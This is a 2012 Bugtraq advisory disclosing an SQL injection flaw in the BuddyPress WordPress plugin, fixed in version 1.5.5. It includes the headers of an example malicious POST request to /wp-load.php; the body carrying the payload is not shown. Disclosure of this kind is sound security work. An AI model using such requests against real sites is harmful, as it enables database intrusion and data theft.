Bugtraq mailing list archives

SQL injection in Wordpress plugin Buddypress
From: ivan_terkin () yahoo com
Date: Sat, 31 Mar 2012 17:27:57 GMT


I would like to disclose an SQL injection vulnerability in the Buddypress plugin affecting the latest versions. This issue was 
reported to the developers and resolved in version 1.5.5. So, I suggest that everyone who has this plugin on their blog update to 
the latest version, if you haven't done so yet. An example of a POST message with SQL injection is below.

POST /wp-load.php HTTP/1.1
User-Agent: Mozilla
Host: example.com
Accept: */*
Referer: http://example.com/activity/?s=b
Connection: Keep-Alive
Content-Length: 153
Content-Type: application/x-www-form-urlencoded

